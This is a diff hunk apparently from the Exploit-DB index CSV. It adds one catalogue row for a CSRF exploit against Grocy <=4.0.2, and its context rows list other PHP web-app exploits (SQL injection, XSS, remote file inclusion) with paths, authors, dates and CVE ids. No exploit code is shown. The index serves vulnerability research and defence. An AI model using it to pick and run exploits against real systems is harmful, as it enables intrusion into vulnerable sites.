@@ -19315,6 +19321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 11107,exploits/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,webapps,php,,2010-01-10,,1,,,,,, 45795,exploits/php/webapps/45795.txt,"Grocery crud 1.6.1 - 'search_field' SQL Injection",2018-11-06,"Loading Kura Kura",webapps,php,80,2018-11-06,2018-11-07,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgrocery-crud-1.6.1.zip, 48792,exploits/php/webapps/48792.txt,"grocy 2.7.1 - Persistent Cross-Site Scripting",2020-09-07,"Mufaddal Masalawala",webapps,php,,2020-09-07,2020-09-07,0,,,,,, +51760,exploits/php/webapps/51760.txt,"Grocy <=4.0.2 - CSRF",2024-01-31,"Chance Proctor",webapps,php,,2024-01-31,2024-01-31,0,,,,,, 51526,exploits/php/webapps/51526.txt,"Groomify v1.0 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,, 7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php,,2009-02-02,,1,OSVDB-51821;CVE-2009-0463,,,,, 7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,webapps,php,,2009-01-25,,1,OSVDB-51628;CVE-2009-0299,,,,,